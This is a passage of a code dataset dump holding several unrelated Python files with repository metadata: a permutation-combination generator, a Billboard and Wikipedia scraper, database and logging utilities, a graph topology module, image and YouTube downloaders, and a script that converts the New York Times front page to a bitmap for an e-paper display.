*reversed(idc[new_i:i])]\n\t\t\t\tassert len(idc) == n\n\t\t\t\n\t\t\ti = new_i\n\t\t\t#swap i1,j\n\t\t\ttry:\n\t\t\t\tif i==j:\n\t\t\t\t\tassert idc[j-1] == idc[i1] < idc[j]\n\t\t\t\telse:\n\t\t\t\t\tassert idc[j-1] < idc[i1] < idc[j]\n\t\t\texcept:\n\t\t\t\tprn(\"n,r; i,j; js; idc\", locs())\n\t\t\t\traise\n\t\t\tidc[i1], idc[j] = idc[j], idc[i1]\n\t\t\tjs[i1] = j+1\n\ndef _ts(f, g):\n\tfor n in rg(0, 5):\n\t\tfor r in rg(0, 5):\n\t\t\t[*a] = f(rg(n), r)\n\t\t\t[*b] = g(n, r)\n\t\t\ttry:\n\t\t\t\tassert a==b\n\t\t\texcept:\n\t\t\t\tpr(f, g)\n\t\t\t\tpr(n, r)\n\t\t\t\tpr(a)\n\t\t\t\tpr(b)\n\t\t\t\traise\n\ndef __product(it, r):\n\treturn product_(it, repeat=r)\ndef _tss():\n\t_ts(combinations, _combinations)\n\t_ts(permutations, _permutations)\n\t_ts(combinations_with_replacement, _combinations_with_replacement)\n\t_ts(__product, _permutations_with_replacement)\n\n\n##############\ndef perm_comb(n, rs):\n\t# perm_comb(4, [2,1]) --> 012 013 021 023 031 032 120 123 130 132 230 231\n\t# :: uint -> [uint] -> [[uint]]\n\t# :: uint -> [uint] -> sorted_lt[unique[uint]{as[{uint}]}]\n\t# :: @n:uint. @rs:[uint]. 
sorted_lt[unique[uint{%n}]{len=sum(rs)}{as[{uint}]}]\n\trs = (*rs,)\n\tr = sum(rs)\n\tfor r_ in rs: range(r_,n)\n\tif not (0 <= r <= n\n\t\t\t\tand all(r_ >= 0 for r_ in rs)\n\t\t\t\t):\n\t\treturn\n\t\n\ti2sz = [\n\t\tsz\n\t\tfor r_ in rs\n\t\tfor sz in reversed(rg(r_))\n\t\t]\n\t\t# remain size of block that cover index i\n\t\n\t\t\n\t#############\n\tidc = list(range(n))\n\t#js = list(range(1, r+1))\n\tjs = [nnn]*r\n\ti = 0\n\t\"\"\"\n\t0 <= i <= r\n\tidc[:i] fixed\n\tidc[i:] sorted_lt\n\t[n>=i'>=i>0]:\n\t\tj = js[i'-1]\n\t\t0 <= i'-1 < j <= n\n\t\tk = idc[i'-1]\n\t\tidc[j-1] <= k\n\t\t[j i:\n\t\t\t\t\t\t\t_e = i\n\t\t\t\t\t\tss.append((_b,_e))\n\t\t\t\t\t\t_b = _e\n\t\t\t\t\tif i < n:\n\t\t\t\t\t\tss.append((i,n))\n\t\t\tif __debug__ and new_i < i:\n\t\t\t\ttry:\n\t\t\t\t\tfor _b,_e in ss:\n\t\t\t\t\t\tfor _i in rg(_b,_e-1):\n\t\t\t\t\t\t\tassert idc[_i] < idc[_i+1]\n\t\t\t\t\tfor x in rg(len(ss)-1):\n\t\t\t\t\t\t_pre_b = ss[x][0]\n\t\t\t\t\t\t_e = ss[x+1][1]\n\t\t\t\t\t\tassert idc[_pre_b] > idc[_e-1]\n\t\t\t\t\t\t\n\t\t\t\texcept:\n\t\t\t\t\tprn(\"n,r; i,new_i,j; js; idc\", locs())\n\t\t\t\t\traise\n\t\t\t#swap i1,j\n\t\t\t#before swap, restore idc[i1+1:]\n\t\t\t\n\t\t\tif new_i < i:\n\t\t\t\t#restore idc[new_i:]\n\t\t\t\tfor _b,_e in ss:\n\t\t\t\t\trvs(idc, _b,_e)\n\t\t\t\trvs(idc, new_i, n)\n\t\t\t\tassert len(idc) == n\n\t\t\t\tassert all(idc[x] < idc[x+1] for x in rg(new_i, n-1))\n\t\t\t\n\t\t\ti = new_i\n\t\t\t#swap i1,j\n\t\t\ttry:\n\t\t\t\tif i==j:\n\t\t\t\t\tassert idc[j-1] == idc[i1] < idc[j]\n\t\t\t\telse:\n\t\t\t\t\tassert idc[j-1] < idc[i1] < idc[j]\n\t\t\texcept:\n\t\t\t\tprn(\"n,r; i,j; js; idc\", locs())\n\t\t\t\traise\n\t\t\tidc[i1], idc[j] = idc[j], idc[i1]\n\t\t\tjs[i1] = j+1\n\t\t\t###########\n\t\t\t###########\n\t\t\t###########\n\t\t\tsz = i2sz[i1]\n\t\t\tif sz:\n\t\t\t\t# idc[i1] is update\n\t\t\t\t# now fill the tail of curr block\n\t\t\t\tjj = js[i1]\n\t\t\t\tif i < jj:\n\t\t\t\t\t#(i,jj,jj+sz) >> sz\n\t\t\t\t\tlshf(idc, -sz, i,jj+sz)\n\t\t\t\tjs[i:i+sz] = rg(jj+1, jj+sz+1)\n\t\t\t\tassert len(js) == r\n\t\t\t\ti += sz\n\n\n\ndef _t_perm_comb():\n\t# perm_comb(4, [2,1]) --> 012 013 021 023 031 032 120 123 130 132 230 231\n\tts = [\n\t\t#n,rs,ans\n\t\t(4, [0,2,0,0,1,0]\n\t\t\t, [(*map(int, s),)\n\t\t\t\tfor s in \"012 013 021 023 031 032 120 123 130 132 230 231\"\n\t\t\t\t.split()\n\t\t\t\t]\n\t\t),(0,[0,0,0]\n\t\t\t\t,[()]\n\t\t),(0,[1]\n\t\t\t\t,[]\n\t\t),(1,[1,0]\n\t\t\t\t,[(0,)]\n\t\t#),(5, [2,2,0,1],[]\n\t\t)\n\t\t]\n\tts += [\n\t\t(n, [1]*r\n\t\t\t,[*permutations(rg(n), r)]\n\t\t)\n\t\tfor n in rg(5)\n\t\tfor r in rg(5)\n\t\t]\n\tts += [\n\t\t(n, [r]\n\t\t\t,[*combinations(rg(n), r)]\n\t\t)\n\t\tfor n in rg(5)\n\t\tfor r in rg(5)\n\t\t]\n\t\n\n\tfor n,rs,ans in ts:\n\t\t[*r] = perm_comb(n, rs)\n\t\ttry:\n\t\t\tassert r==ans\n\t\texcept:\n\t\t\tprn('n,rs;ans;r', locs())\n\t\t\traise\n\n\nif __name__ == \"__main__\":\n\t_tss()\n\t_t_perm_comb()\n\n\n\n\n", "repo_name": "edt-yxz-zzd/txt_phone", "sub_path": "txt/script/seed_/perm_comb[ver1].py", "file_name": "perm_comb[ver1].py", "file_ext": "py", "file_size_in_byte": 8293, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "itertools.product", "line_number": 191, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 193, "usage_type": "argument"}, {"api_name": "itertools.permutations", "line_number": 194, "usage_type": "argument"}, {"api_name": "itertools.combinations_with_replacement", "line_number": 195, 
"usage_type": "argument"}, {"api_name": "itertools.permutations", "line_number": 369, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 376, "usage_type": "call"}]}
+{"seq_id": "18081231104", "text": "# %%\nimport billboard\nfrom datetime import date\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\n# %%\nstart_year = 1990\nend_year = 2022\n\nyear_charts = {} # Dictionary to hold data for all dates\n\nfor year in range(start_year, end_year + 1):\n daterange = (\n pd.date_range(f\"{year}-01-01\", f\"{year}-12-31\", freq=\"W\")\n .strftime(\"%Y-%m-%d\")\n .tolist()[:52]\n )\n\n for idx, date in enumerate(daterange):\n print(f\"Fetching data for {year}, week {idx + 1}\")\n chart = billboard.ChartData(\"hot-100\", date=date)\n song_list = []\n artist_list = []\n rank_list = []\n\n for song in chart:\n song_list.append(song.title)\n artist_list.append(song.artist)\n rank_list.append(song.rank)\n\n if date not in year_charts:\n year_charts[date] = {\n \"song\": [],\n \"artist\": [],\n \"rank\": [],\n }\n\n year_charts[date][\"song\"].extend(song_list)\n year_charts[date][\"artist\"].extend(artist_list)\n year_charts[date][\"rank\"].extend(rank_list)\n\n\n# %%\n# Initialize a dictionary to store song-rank mappings for each date\nsong_ranks = {}\n\n# Collect song ranks for each date\nfor date, data in year_charts.items():\n for idx, song in enumerate(data[\"song\"]):\n artist = data[\"artist\"][idx]\n rank = data[\"rank\"][idx]\n if (artist, song) not in song_ranks:\n song_ranks[(artist, song)] = {}\n song_ranks[(artist, song)][date] = rank\n\n# Create a DataFrame from the collected song ranks\ndate_columns = list(year_charts.keys())\ncolumns = [\"Artist\", \"Song\"] + date_columns\ndata_rows = []\n\nfor (artist, song), ranks in song_ranks.items():\n row = [artist, song]\n for date in date_columns:\n row.append(ranks.get(date, float(\"NaN\")))\n data_rows.append(row)\n\nsongs_df = pd.DataFrame(data_rows, columns=columns)\n\n# Display the resulting DataFrame\nprint(songs_df)\n\n# %%\nsongs_df.to_excel(\"songs_df.xlsx\", index=False)\n\n# %%\n# Load the data\nexcel_file_name = \"songs_df.xlsx\"\n# Read the Excel file into a dictionary of dataframes\nsongs_df = pd.read_excel(excel_file_name)\n\n\n# %%\n# Function to generate Wikipedia URLs for artists\ndef generate_wikipedia_urls(artist):\n # Replace spaces with underscores and create Wikipedia URL\n return f\"https://en.wikipedia.org/wiki/{artist.replace(' ', '_')}\"\n\n\n# Add a new column 'Wikipedia_Page' with Wikipedia URLs\nsongs_df[\"Wikipedia_Page\"] = songs_df[\"Artist\"].apply(generate_wikipedia_urls)\n\n# Display the updated DataFrame\nprint(songs_df)\n\n\n# %%\n# Function to scrape artist's genre from Wikipedia\ndef scrape_artist_genre(url):\n try:\n response = requests.get(url, timeout=10) # Set a timeout to prevent hanging\n if response.status_code == 200:\n soup = BeautifulSoup(response.content, \"html.parser\")\n infobox = soup.find(\"table\", {\"class\": \"infobox\"})\n if infobox:\n rows = infobox.find_all(\"tr\")\n for row in rows:\n if row.th and row.th.text.strip() == \"Genres\":\n genres = row.td.text.strip()\n return genres\n return None\n except requests.RequestException as e:\n print(f\"Request Exception: {e}\")\n return None\n\n\n# Iterate through each row and fetch genre for each artist's Wikipedia page\nfor index, row in songs_df.iterrows():\n url = row[\"Wikipedia_Page\"]\n artist = row[\"Artist\"]\n genre = scrape_artist_genre(url)\n songs_df.loc[songs_df[\"Artist\"] == artist, \"Genre\"] = genre\n print(f\"Artist: {artist} - Genre: {genre}\")\n\n# Display the updated DataFrame\nprint(songs_df[\"Genre\"])\n# %%\ngenre_df = songs_df[[\"Artist\", 
\"Genre\"]]\ngenre_df = genre_df.drop_duplicates(subset=[\"Artist\"], keep=\"first\")\n\n# %%\nprint(genre_df[\"Artist\"].count() - genre_df[\"Genre\"].count(), \"songs have null genre.\")\n# %%\ngenre_df.to_excel(\"genre_df.xlsx\", index=False)\n\n# %%\n", "repo_name": "alonbenach/music_data", "sub_path": "scraper_top100.py", "file_name": "scraper_top100.py", "file_ext": "py", "file_size_in_byte": 3981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.date_range", "line_number": 16, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 21, "usage_type": "name"}, {"api_name": "billboard.ChartData", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 23, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 33, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 34, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 40, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 42, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 50, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 56, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 65, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 66, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 81, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 102, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 104, "usage_type": "call"}, {"api_name": "requests.RequestException", "line_number": 113, "usage_type": "attribute"}]}
+{"seq_id": "33865847051", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"Provides utilities for connecting to SQL databases and for logging.\"\"\"\n\nfrom configparser import ConfigParser\nimport logging\nimport os\nimport sqlalchemy\nfrom utilities.decorators import error_trap\n\n\ndef _get_config(filename, section):\n parser = ConfigParser() # create a parser\n parser.read(filename) # read config file\n\n # get section\n db = {}\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = param[1]\n else:\n raise Exception('\"{}\" section not found in {}'.format(section,\n filename))\n return db\n\n\n@error_trap\ndef _connect(section, filename):\n # read connection parameters and build connection url\n params = _get_config(filename, section)\n dialect = params['dialect']\n if params.get('connector'):\n dialect += '+' + params['connector']\n db_url = '{}://{}:{}@{}'.format(dialect, params['user'],\n params['password'], params['host'])\n if params.get('port'):\n db_url += ':{}'.format(params['port'])\n db_url += '/{}'.format(params['dbname'])\n\n # connect to the SQL server\n print('Connecting to the database...')\n con = sqlalchemy.create_engine(db_url).connect()\n if params.get('search_path'):\n con.execute('SET search_path TO ' + params['search_path'])\n\n # display the database name, and server dialect and version\n db_version = con.execute('SELECT version()').fetchall()[0][0]\n print('{} -- {} VERSION {}'.format(params['dbname'].upper(),\n params['dialect'].upper(),\n db_version))\n return con\n\n\ndef connect(section,\n filename=os.path.expanduser('~/projects/utilities/database.ini')):\n \"\"\"Connect to the SQL database server and return connectable.\"\"\"\n con, err = _connect(section, filename)\n if err:\n print(err)\n return None\n else:\n return con\n\n\nclass Logger(object):\n def __init__(self, name=__name__, log_path='.', log_file='out.log',\n logger_level=logging.DEBUG, file_level=logging.DEBUG,\n stream_level=logging.ERROR, date_format='%Y-%m-%d %H:%M:%S',\n log_format='%(asctime)s - %(name)s - ' +\n '%(levelname)s - %(message)s'):\n self.logger = logging.getLogger(name)\n self.logger.setLevel(logger_level)\n fh = logging.FileHandler(os.path.join(log_path, name + '-' + log_file))\n fh.setLevel(file_level)\n ch = logging.StreamHandler()\n ch.setLevel(stream_level)\n formatter = logging.Formatter(log_format, datefmt=date_format)\n ch.setFormatter(formatter)\n fh.setFormatter(formatter)\n self.logger.addHandler(ch)\n self.logger.addHandler(fh)\n\n def critical(self, message):\n return self.logger.critical(message)\n\n def debug(self, message):\n return self.logger.debug(message)\n\n def error(self, message):\n return self.logger.error(message)\n\n def exception(self, message):\n return self.logger.exception(message)\n\n def info(self, message):\n return self.logger.info(message)\n\n def warning(self, message):\n return self.logger.warning(message)\n", "repo_name": "robburnett7/utilities", "sub_path": "general_utilities.py", "file_name": "general_utilities.py", "file_ext": "py", "file_size_in_byte": 3360, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "configparser.ConfigParser", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 43, "usage_type": "call"}, {"api_name": "utilities.decorators.error_trap", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 56, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 68, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 72, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "22761263516", "text": "import networkx as nx\nfrom graph.base import GraphBaseModule\n\n\nclass TopologyModule(GraphBaseModule):\n def __init__(self, DG=None):\n self.DG = DG\n if not self.DG:\n super(TopologyModule, self).__init__()\n self.create()\n\n def mutuals(self, node: str = None, depth_limit: int = None):\n mutual_graph = nx.Graph()\n\n if depth_limit is None:\n nodes = list(self.DG.nodes())\n num_nodes = len(nodes)\n\n for i in range(num_nodes):\n for j in range(i+1, num_nodes):\n if self.DG.has_edge(nodes[i], nodes[j]) and self.DG.has_edge(nodes[j], nodes[i]):\n mutual_graph.add_edge(nodes[i], nodes[j])\n\n return mutual_graph\n\n else:\n not_visited = list()\n not_visited.append(node)\n\n depth = 0\n while len(not_visited) != 0:\n depth += 1\n current_node = not_visited.pop(0)\n for (source, target) in self.DG.edges(current_node):\n if self.DG.has_edge(target, source):\n not_visited.append(target)\n mutual_graph.add_edge(source, target)\n\n if depth == depth_limit:\n break\n\n return mutual_graph\n\n def neighbourhood_depth(self, node, neighbour_depth):\n neighbours_graph = nx.DiGraph()\n for source, target in nx.bfs_edges(self.DG, node, depth_limit=neighbour_depth):\n neighbours_graph.add_edge(source, target)\n\n edge_attributes = {(source, target): self.DG[source][target]}\n nx.set_edge_attributes(neighbours_graph, edge_attributes)\n\n source_node_attributes = {source: self.DG.nodes(data=True)[source]}\n target_node_attributes = {target: self.DG.nodes(data=True)[target]}\n\n nx.set_node_attributes(neighbours_graph, source_node_attributes)\n nx.set_node_attributes(neighbours_graph, target_node_attributes)\n\n return neighbours_graph\n\n # neighbours_graph = nx.DiGraph()\n\n # visited = set()\n # not_visited = list()\n # not_visited.append(node)\n\n # depth = 0\n # while len(not_visited) != 0:\n # depth += 1\n # current_node = not_visited.pop(0)\n # for source, target in self.DG.edges(current_node):\n # if target not in visited:\n # not_visited.append(target)\n # neighbours_graph.add_edge(source, target)\n\n # visited.add(current_node)\n\n # if depth == neighbor_depth:\n # break\n\n # return neighbours_graph\n", "repo_name": "Muhammad-Feili/Entitology", "sub_path": "graph/topology.py", "file_name": "topology.py", "file_ext": "py", "file_size_in_byte": 2820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "graph.base.GraphBaseModule", "line_number": 5, "usage_type": "name"}, {"api_name": "networkx.Graph", "line_number": 13, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 45, "usage_type": "call"}, {"api_name": "networkx.bfs_edges", "line_number": 46, "usage_type": "call"}, {"api_name": "networkx.set_edge_attributes", "line_number": 50, "usage_type": "call"}, {"api_name": "networkx.set_node_attributes", "line_number": 55, "usage_type": "call"}, {"api_name": "networkx.set_node_attributes", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "2011577296", "text": "\nfrom tkinter import *\n\nfrom tkinter import ttk\nfrom tkinter import filedialog\n\nimport requests\n\nFolder = ''\n\ndef openLocation():\n global Folder\n\n Folder = filedialog.askdirectory()\n\n if (len(Folder)> 1):\n\n locationError.config(text=Folder,fg='green')\n\n else:\n\n locationError.config(text=\"Please Choose the File Location\",fg='red') \n\n\ndef Download():\n\n url = urlentry.get()\n\n filename = url.split('/')[-1]\n\n fold = Folder\n\n if (len(url)>1):\n urlerror.config(text=\"\")\n\n with requests.get(url, stream=True) as r:\n\n # print(\"DOWNLOADING IMAGE....!!!\")\n\n with open(fold+'/'+filename,\"wb\") as f:\n\n # print('Processing...')\n for ch in r.iter_content(chunk_size=1024):\n f.write(ch)\n\n f.close()\n urlerror.config(text=\"Download Completed!!\")\n\n else:\n\n urlerror.config(text=\"Please Enter the Url\")\n\nroot = Tk()\n\nroot.title('Image Downloader')\n\nroot.geometry('350x400')\n\nroot.columnconfigure(0,weight=1)\n\nurllab = Label(root, text=\"Enter the Url\")\n\nurllab.grid()\n\nurlentryVar = StringVar()\n\nurlentry = Entry(root,width=50, textvariable=urlentryVar)\n\nurlentry.grid()\n\n\nurlerror = Label(root, text=\"Error\", fg='red')\nurlerror.grid()\n\nsaveLabel = Label(root, text=\"Save the Image File\")\n\nsaveLabel.grid()\n\nsaveEntry = Button(root,width=10,fg='green',bg='white',text='Choose Path',command=openLocation)\nsaveEntry.grid()\n\n\nlocationError = Label(root, text=\"Error\",fg='red')\n\nlocationError.grid()\n\n\nDownloadbt = Button(root,text='Download',width=15,command=Download)\n\nDownloadbt.grid()\n\n\n\nroot.mainloop()\n\n\n\n\n", "repo_name": "pjpalaaash/Image_Downloader", "sub_path": "Image_Downloader/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tkinter.filedialog.askdirectory", "line_number": 14, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 14, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "23090562640", "text": "from pytube import YouTube\r\nfrom moviepy.video.io.ffmpeg_tools import ffmpeg_extract_audio\r\nimport os\r\n\r\n\r\n# Function to download and convert YouTube video to MP3\r\ndef download_youtube_video_as_mp3(video_url, output_directory):\r\n try:\r\n # Create a YouTube object\r\n yt = YouTube(video_url)\r\n\r\n # Get the highest resolution stream\r\n video_stream = yt.streams.get_highest_resolution()\r\n\r\n # Get the title of the YouTube video\r\n video_title = yt.title\r\n\r\n # Replace any invalid characters in the title with underscores\r\n video_title = \"\".join(x if x.isalnum() or x in [' ', '.', '-'] else '_' for x in video_title)\r\n\r\n # Download the video with the YouTube video's title as the file name\r\n video_filename = f\"{video_title}.mp4\"\r\n video_stream.download(output_path=output_directory, filename=video_filename)\r\n\r\n # Construct the paths for video and audio files\r\n video_path = os.path.join(output_directory, video_filename)\r\n mp3_filename = f\"{video_title}.mp3\"\r\n mp3_path = os.path.join(output_directory, mp3_filename)\r\n\r\n # Extract audio from the downloaded video and save it as an MP3 file\r\n ffmpeg_extract_audio(video_path, mp3_path)\r\n\r\n # Remove the downloaded video file (optional)\r\n os.remove(video_path)\r\n\r\n print(f'Video downloaded as MP3 with the YouTube title: {mp3_path}')\r\n except Exception as e:\r\n print(f'An error occurred: {str(e)}')\r\n\r\n\r\n# Get user input for the YouTube video URL and the directory\r\nvideo_url = input(\"Enter the YouTube video URL: \")\r\noutput_directory = input(\"Enter the directory where you want to save the MP3: \")\r\n\r\ndownload_youtube_video_as_mp3(video_url, output_directory)\r\n", "repo_name": "yogaraj95/YouTube_Downloader_Python", "sub_path": "YouTubeDownloader/downloader/youtube2mp3.py", "file_name": "youtube2mp3.py", "file_ext": "py", "file_size_in_byte": 1759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pytube.YouTube", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "moviepy.video.io.ffmpeg_tools.ffmpeg_extract_audio", "line_number": 31, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "74597034328", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport skimage.io as iio\n\nfrom imlib.dtype import im2float\n\n\ndef imread(path, as_gray=False):\n \"\"\"Read image.\n\n Returns:\n Float64 image in [-1.0, 1.0].\n \"\"\"\n image = iio.imread(path, as_gray)\n if image.dtype == np.uint8:\n image = image / 127.5 - 1\n elif image.dtype == np.uint16:\n image = image / 32767.5 - 1\n else:\n raise Exception(\"Inavailable image dtype: %s!\" % image.dtype)\n return image\n\n\ndef imwrite(image, path):\n \"\"\"Save an [-1.0, 1.0] image.\"\"\"\n iio.imsave(path, im2float(image))\n\n\ndef imshow(image):\n \"\"\"Show a [-1.0, 1.0] image.\"\"\"\n iio.imshow(im2float(image))\n\n\nshow = iio.show\n", "repo_name": "LynnHo/Conditional-GANs-Pytorch", "sub_path": "imlib/basic.py", "file_name": "basic.py", "file_ext": "py", "file_size_in_byte": 784, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 57, "dataset": "github-code", "pt": "31", "api": [{"api_name": "skimage.io.imread", "line_number": 17, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 20, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 29, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 29, "usage_type": "name"}, {"api_name": "imlib.dtype.im2float", "line_number": 29, "usage_type": "call"}, {"api_name": "skimage.io.imshow", "line_number": 34, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 34, "usage_type": "name"}, {"api_name": "imlib.dtype.im2float", "line_number": 34, "usage_type": "call"}, {"api_name": "skimage.io.show", "line_number": 37, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "22806918276", "text": "#!/usr/bin/python3\n\n###############################\n# 12 jan 2021\n# 2 mars 2021 \n# check request return code. pdf may not be available\n# use lighttpd , instead of OMV5 nginx. needed to use different urequests because of redirect; and error ???\n##############################\n\n\"\"\"\npip3 install pdf2image\npip3 install --user pillow\n\napt install poppler-utils\nor in anaconda powershell\nconda install -c conda-forge poppler\n\n\napt install dos2unix\n use dos2unix, unix2dos\n\"\"\"\nimport datetime\n\nx = datetime.datetime.now()\nprint(x)\n\nprint('get pdf from NTY. convert in pbm')\n\nimport sys\nprint('python executable: ' , sys.executable)\n\nimport platform\n\nif platform.node() == 'openmediavault': # running on raspberry. \n\n\t# to be copied on web server\n\tfile1 = '/home/pi/ramdisk/nyt_today.pbm'\nelse:\n\t# running on windows. will synch directly to ESP flash memory with v scode\n\tfile1 = 'src/nyt_today.pbm' \n\n\n# webserver file\n#file2 = '/var/www/openmediavault/nyt_today.pbm' # will be served as static file my my webserver\nfile2 = '/var/www/html/epaper/nyt_today.pbm' # will be served as static file my my webserver\n#image/x-portable-bitmap\n\n\n# debug. access pdf also (browser do not display pbm; just download them)\n#file3= '/var/www/openmediavault/nyt_today.pdf' # will be served as static file my my webserver\nfile3= '/var/www/html/epaper/nyt_today.pdf' # will be served as static file my my webserver\n\n\nprint('web server path for pbm' , file2)\n\nfrom PIL import Image, ImageFilter, ImageEnhance, ImageOps\n\nimport requests\nfrom datetime import date\n\n\"\"\"\n# 4.2 inch\nepd_w = 400\nepd_h = 300\n\"\"\"\n\n\"\"\"\n# v1 7.5\nepd_w = 640\nepd_h = 384\n\"\"\"\n\n\n# v2 7.5 inch\nepd_w = 800\nepd_h = 480\n\n\n\ntoday = date.today()\nd = today.strftime('%d')\nm = today.strftime('%m')\ny = today.strftime('%Y')\n\n\n################################\n# today's file. WARNING. with time difference, may not exists yet\n################################\n\nnyt = \"https://static01.nyt.com/images/\" + str(y) + '/' + str(m) + '/' + str(d) + '/nytfrontpage/scan.pdf'\nprint('url nyt:', nyt)\n\n#nyt = 'https://static01.nyt.com/images/2020/11/10/nytfrontpage/scan.pdf'\n\npdf_file = 'nyt_today.pdf'\nprint(\"get TODAY's pdf from NYT into \", pdf_file)\n\n\n\n#Make a HEAD request to a web page, and return the HTTP headers:\n#HEAD requests are done when you do not need the content of the file, but only the status_code or HTTP headers.\n#The requests.Response() Object contains the server's response to the HTTP request.\n\nh = requests.head(nyt, allow_redirects=True)\nprint('headers: ', h.headers)\nprint('content type: ', h.headers.get('Content-Type'))\n\n\nr = requests.get(nyt, allow_redirects=True)\n\nprint('get status code : ', r.status_code)\nprint('get OK : ', r.ok)\n\nprint('is redirect : ', r.is_redirect)\nprint('is permanent redirect : ', r.is_permanent_redirect)\nprint('elapsed : ', r.elapsed)\nprint('url : ', r.url)\n\nprint('type of content ', type(r.content))\n\n\nif r.ok == False:\n\tprint('request get failed. 
maybe the pdf is not yet available')\n\tsys.exit(1)\n\n\n# write pdf file\nopen(pdf_file, 'wb').write(r.content)\n\n#https://stackoverflow.com/questions/46184239/extract-a-page-from-a-pdf-as-a-jpeg\n#https://pypi.org/project/pdf2image/\n\nfrom pdf2image import convert_from_path, convert_from_bytes\n\n#https://www.waveshare.com/wiki/7.5inch_e-Paper_HAT\npages = convert_from_path(pdf_file, dpi=200, grayscale=True) # list of PIL images\n\n# first (and only) page\nim = pages[0]\n\n\"\"\"\nim.save('nty_today.jpg', 'JPEG')\nim.save('nty_today.pbm') # portable bit map\n\"\"\"\n\nprint('1st and only pdf page: ', im.format, im.size, im.mode) # PPM (2442, 4685) L\n# L means luminance, ie grayscale. for color RGB\n# PPM portable pixmap\n# https://en.wikipedia.org/wiki/Netpbm\n\n# crop top of image, 0 is upper left corner\n# region is defined by a 4-tuple, where coordinates are (left, upper, right, lower).\n\nprint('epaper aspect ratio ', epd_w/epd_h)\n\nW=im.size[0]\nH = W * epd_h / epd_w # would keep aspect ratio\n\n# but rather\nH=im.size[1]/2 # see more content vs keeping ratio\n\nprint('crop aspect ratio to get more content, H is org size /2 , W is org size ', W/H)\n\nbox = (0,100,W,H)\n# 100 remove top layer. trial and error\n# get top half the page of NYT pdf. 7.5 inch is still a small screen. and we get the headlines\n\ntop = im.crop(box)\n#top = ImageOps.invert(top) # otherwize, reversed on epaper\n\n#top = top.resize((epd_h, epd_w)) # portrait mode\nprint('resize to epaper, landscape mode')\ntop = top.resize((epd_w, epd_h)) # use epaper in landscape mode\ntop = top.filter(ImageFilter.DETAIL)\n\n# based on how you set up the epaper dispay\n#top = top.transpose(Image.ROTATE_180) # epaper connector on top\n\ntop.show() # will block\n\ntop = top.convert('1') # to get portable bit map P4, ie just black and white vs grayscale\nprint('pbm: ', top.format, top.size, top.mode)\n\n# either ramdisk or src\ntop.save(file1) # portable bit map\n\n# if on PI, copy to webserver\nif platform.node() == 'openmediavault':\n\n\tprint('running on raspberry, remove first 2 lines to only keep bitmap')\n\t# remove 1st two lines to only keep the real bitmap\n\t# P4 then the bitmap starts\n\n\twith open(file1, 'rb') as fp:\n\t\tfp.readline()\n\t\tfp.readline()\n\t\tbuf = 